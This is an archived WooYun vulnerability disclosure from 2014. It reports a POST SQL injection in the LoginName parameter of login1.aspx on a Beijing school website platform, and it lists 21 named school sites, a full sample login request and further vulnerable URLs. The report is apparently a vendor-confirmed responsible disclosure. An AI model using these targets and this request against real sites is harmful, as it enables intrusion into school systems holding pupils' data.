乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-10: 细节已通知厂商并且等待厂商处理中 2014-10-14: 厂商已经确认,细节仅向厂商公开 2014-10-17: 细节向第三方安全合作伙伴开放 2014-12-08: 细节向核心白帽子及相关领域专家公开 2014-12-18: 细节向普通白帽子公开 2014-12-28: 细节向实习白帽子公开 2015-01-08: 细节向公众公开
影响北京市所有幼儿园中小学
程序名称:校园网群信息点开发商:创星伟业 http://www.conking.com.cn/漏洞类型:SQL注入(POST型)漏洞文件:login1.aspx漏洞参数:Login:LoginName影响用户:
收集站点:
1.北京市西单小学(http://www.xjxdxx.org/)2.北京市铁路第二中学(http://www.bjt2z.cn/)3.北京一六一中学(http://www.bj161zhx.org/)4.北京市第十三中学(http://www.bj13zhx.org/)5.北京市第7中学(http://www.bj7zhx.org/)6.北京市西城区奋斗小学(http://www.xjfdxx.org/)7.北京市西城区四根柏小学(http://www.sgbxx.org/)8.北京市西城区西四北四条小学(http://www.xjxsb4txx.org/)9.北京市西城区中古友谊小学(http://www.xjzhgyyxx.org/)10.北京市西城区教育考试中心(http://www.xjks.org/)11.北京市西城区鸦儿胡同小学(http://www.xjyexx.org/)12.北京市西城区白云路小学(http://www.xjbylxx.org/)13.北京第三中学(http://www.bj3zhx.org/)14.北京市第四十四中学(http://www.bj44zhx.org/)15.北京市西城区阜成门外第一小学(http://www.xjfchmw1x.org/)16.北京市第五十六中学(http://www.bj56zhx.org/)17.北京教育学院附属中学(http://www.bjjyfzh.org/)18.北京市西城区中华路小学(http://www.bjzhhlxx.org/)19.北京市第八中学分校(http://www.no8ms.org/)20.北京市第六幼儿园(http://bj6y.org/)21.北京市外事学校(http://www.bjwszg.org/)
实例演示:1.http://www.xjxdxx.org/login1.aspxPOST包:
POST /login1.aspx HTTP/1.1Host: www.xjxdxx.orgProxy-Connection: keep-aliveContent-Length: 3634Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.xjxdxx.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.xjxdxx.org/login1.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: ASP.NET_SessionId=rdnjmd45t3lh2fm14vzazorx; CheckCode=H74L; CNZZDATA1044803=cnzz_eid%3D1062287209-1412859161-%26ntime%3D1412859161__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwyMDEwODA5MjAwO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BO2k8NT47PjtsPHQ8O2w8aTwwPjtpPDE%2BO2k8Mj47aTwzPjs%2BO2w8dDxwPGw8aW5uZXJodG1sOz47bDzku4rlpKnmmK8yMDE05bm0MTDmnIgwOeaXpSDmmJ%2FmnJ%2Flm5sg5Yac5Y6G55Sy5Y2IIOmprOW5tCDkuZ3mnIjljYHlha0g5YyX5LqsOiDpnL7ovazpm74g5peg5oyB57ut6aOO5ZCR5b6u6aOOIDEz4oSD772eMjLihIMgXDxpbWcgc3JjPSJodHRwOi8vd3d3LmJqeGNzbmcub3JnL2ltYWdlcy93ZWF0aGVyL25vdGhpbmcuZ2lmIiBib3JkZXI9IjAiIHdpZHRoPSIxOCIgaGVpZ2h0PSIxMyIgYWxpZ249ImFic21pZGRsZSIgL1w%2BIFw8aW1nIHNyYz0iaHR0cDovL3d3dy5ianhjc25nLm9yZy9pbWFnZXMvd2VhdGhlci8xOC5naWYiIGJvcmRlcj0iMCIgd2lkdGg9IjE4IiBoZWlnaHQ9IjEzIiBhbGlnbj0iYWJzbWlkZGxlIiAvXD47Pj47Oz47dDxwPGw8c3R5bGU7PjtsPGJhY2tncm91bmQ6dXJsKCcvZmlsZXMvYmFubmVyL3cxdDh2M244bThxMmEuanBnJylcOzs%2BPjtsPGk8MT47aTwzPjs%2BO2w8dDxwPGw8aW5uZXJodG1sOz47bDxcPGltZyBzcmM9Jy9maWxlcy9sb2dvLydcPjs%2BPjs7Pjt0PHA8bDxpbm5lcmh0bWw7PjtsPFw8RU1CRUQgcGx1Z2luc3BhZ2U9J2h0dHA6Ly93d3cubWFjcm9tZWRpYS5jb20vZ28vZ2V0Zmxhc2hwbGF5ZXInIHNyYz0nL2ltYWdlcy9zMS5zd2YnIHR5cGU9J2FwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXNoJyBxdWFsaXR5PSdoaWdoJyB3bW9kZT0ndHJhbnNwYXJlbnQnXD5cPC9FTUJFRFw%2BOz4%2BOzs%2BOz4%2BO3Q8cDxsPGlubmVyaHRtbDs%2BO2w8XDx1bFw%2BXDxsaVw%2BXDxhIGhyZWY9Ii9pbmRleC5hc3B4Ilw%2B6aaW6aG1XDwvYVw%2BXDwvbGlcPlw8bGlcPlw8YSBocmVmPSIvcGFnZS5hc3B4P2lkPTEiXD7lrabmoKHmpoLlhrVcPC9hXD5cPC9saVw%2BXDxsaVw%2BXDxhIGhyZWY9Ii9wYWdlLmFzcHg%2FaWQ9MiJcPuagoeWbreWKqOaAgVw8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0iL3BhZ2UuYXNweD9pZD0zIlw%2B5b636IKy5aSp5ZywXDwvYVw%2BXDwvbGlcPlw8bGlcPlw8YSBocmVmPSIvcGFnZS5hc3B4P2lkPTUiXD7lr7nlpJbkuqTmtYFcPC9hXD5cPC9saVw%2BXDxsaVw%2BXDxhIGhyZWY9Ii9wYWdlLmFzcHg%2FaWQ9NCJcPuaVmeWtpueglOeptlw8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0iL3BhZ2UuYXNweD9pZD02Ilw%2B5a2m55Sf5LiW55WMXDwvYVw%2BXDwvbGlcPlw8bGlcPlw8YSBocmVmPSIvcGFnZS5hc3B4P2lkPTciXD7lrrbplb%2Fnqbrpl7RcPC9hXD5cPC9saVw%2BXDxsaVw%2BXDxhIGhyZWY9Ii9wYWdlLmFzcHg%2FaWQ9OCJcPuaLm%2BeUn%2BWSqOivolw8L2FcPlw8L2xpXD5cPGxpXD5cPGEgaHJlZj0iL3BhZ2UuYXNweD9pZD05Ilw%2B5YWJ6I2j5qacXDwvYVw%2BXDwvbGlcPlw8bGlcPlw8YSBocmVmPSIvcGFnZS5hc3B4P2lkPTE3IiB0YXJnZXQ9Il9ibGFuayJcPuWPr%2BinhuWMluWxleekulw8L2FcPlw8L2xpXD5cPC91bFw%2BOz4%2BOzs%2BO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8MT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8Mz47Pj47bDxpPDA%2BO2k8MT47aTwyPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PHA8cDxsPE5hdmlnYXRlVXJsO1RhcmdldDs%2BO2w8Li4vaW5mby5hc3B4P2lkPTM2MDtfYmxhbms7Pj47cDxsPFRpdGxlOz47bDznm7TpgJrjgJDnhornjKvpopHpgZPjgJE7Pj4%2BO2w8aTwwPjs%2BO2w8dDxAPOebtOmAmuOAkOeGiueMq%2BmikemBk%2BOAkTs%2BOzs%2BOz4%2BOz4%2BO3Q8O2w8aTwxPjs%2BO2w8dDxwPHA8bDxOYXZpZ2F0ZVVybDtUYXJnZXQ7PjtsPC4uL2luZm8uYXNweD9pZD0zMjQ7X2JsYW5rOz4%2BO3A8bDxUaXRsZTs%2BO2w85a2m55Sf55S15a2Q5a2m57GN5L%2Bh5oGv5b2V5YWl6K%2B05piO5Y%2BK6KGo5qC85LiL6L29Oz4%2BPjtsPGk8MD47PjtsPHQ8QDzlrabnlJ%2FnlLXlrZDlrabnsY3kv6Hmga%2FlvZXlhaXor7TmmI7lj4rooajmoLzkuIvovb07Pjs7Pjs%2BPjs%2BPjt0PDtsPGk8MT47PjtsPHQ8cDxwPGw8TmF2aWdhdGVVcmw7VGFyZ2V0Oz47bDwuLi9pbmZvLmFzcHg%2FaWQ9MjY5O19ibGFuazs%2BPjtwPGw8VGl0bGU7PjtsPOWunueUqOW%2BruWNmuWcsOWdgOmbhumUpjs%2BPj47bDxpPDA%2BOz47bDx0PEA85a6e55So5b6u5Y2a5Zyw5Z2A6ZuG6ZSmOz47Oz47Pj47Pj47Pj47Pj47Pj47Pj47Pj47Pj47dDw7bDxpPDA%2BO2k8MT47aTwyPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDw2NjAyMzM5Oz4%2BOz47Oz47dDxwPHA8bDxUZXh0Oz47bDw3MDYwOTs%2BPjtwPGw8dGl0bGU7PjtsPOWPkeeUn%2BWcqDIwMTAtNS0xMSAxODowMTowMDs%2BPj47Oz47dDxwPHA8bDxUZXh0Oz47bDwyMzE7Pj47Pjs7Pjs%2BPjs%2BPjs%2BPjtsPExvZ2luOlJlbWVtYmVyUGFzc3dvcmQ7TG9naW46T2tCdXR0b247TG9naW46UmV0dXJuQnV0dG9uOz4%2BhiZmqZz%2BUjaZA65rh1AQIeZJenE%3D&__VIEWSTATEGENERATOR=08C3A5DC&Login%3ALoginName=admin&Login%3ALoginPassword=111111&Login%3AOkButton.x=26&Login%3AOkButton.y=8&Login%3ALoginForced=true&Login%3ARememberLoginPassword=
2.http://www.bjt2z.cn/login1.aspx
3.http://www.bj161zhx.org/login1.aspx
4.http://www.bj13zhx.org/login1.aspx
5.http://www.xjfdxx.org/login1.aspx
参数过滤
危害等级:高
漏洞Rank:15
确认时间:2014-10-14 17:07
暂无